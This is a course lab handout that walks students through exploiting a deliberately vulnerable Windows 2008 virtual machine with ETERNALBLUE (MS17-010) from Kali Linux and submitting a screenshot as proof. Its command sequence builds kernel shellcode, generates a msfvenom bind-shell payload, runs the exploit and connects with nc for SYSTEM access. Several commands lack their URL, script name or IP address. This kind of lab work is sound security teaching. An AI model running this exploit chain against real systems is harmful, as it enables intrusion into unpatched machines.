Project 8x: ETERNALBLUE v. Windows (10 pts. extra credit)

What You Need

  1. A Kali Linux machine, real or virtual
  2. The vulnerable Windows 2008 Server you prepared in a previous project


This is an NSA exploit, stolen by the Russian government under its "ShadowBrokers" alias, and publicly exposed in April, 2017. It was used in the Wannacry malware, which hit hospitals in the UK, forcing them to divert emergency patients.

For technical details of this exploit, see this page:

Launch the VMs

Launch Kali and Windows 2008. Find the IP addresses of both machines and make sure you can ping from one to the other.


In Kali, execute these commands (one at a time). Change the IP address in the last commands to the IP address of your Windows target.

These commands copy the Git repository of code, compile the assembly-language shellcode portion, create Metasploit shellcode, combine the two shellcodes into one file, and run the ETERNALBLUE exploit (stolen from the NSA) to exploit the target.

git clone
cd MS17-010
nasm -f bin shellcode/eternalblue_kshellcode_x86.asm
msfvenom -p windows/shell_bind_tcp -f raw -o bind86.bin EXITFUNC=thread
cat shellcode/eternalblue_kshellcode_x86 bind86.bin > scx86.bin
python scx86.bin
nc 4444
As shown below, you now have SYSTEM privileges on the target.

Capturing a Screen Image

Make sure the "python" command and the "nt authority\system" message are visible, as shown above.

Capture a whole-desktop image and save it as "Proj 8x".


Turning in Your Project

Email the image to with a subject line of "Proj 8x From YOUR NAME", replacing "YOUR NAME" with your real name.

Send a Cc to yourself.

Last Modified: 8-24-17 1:30 pm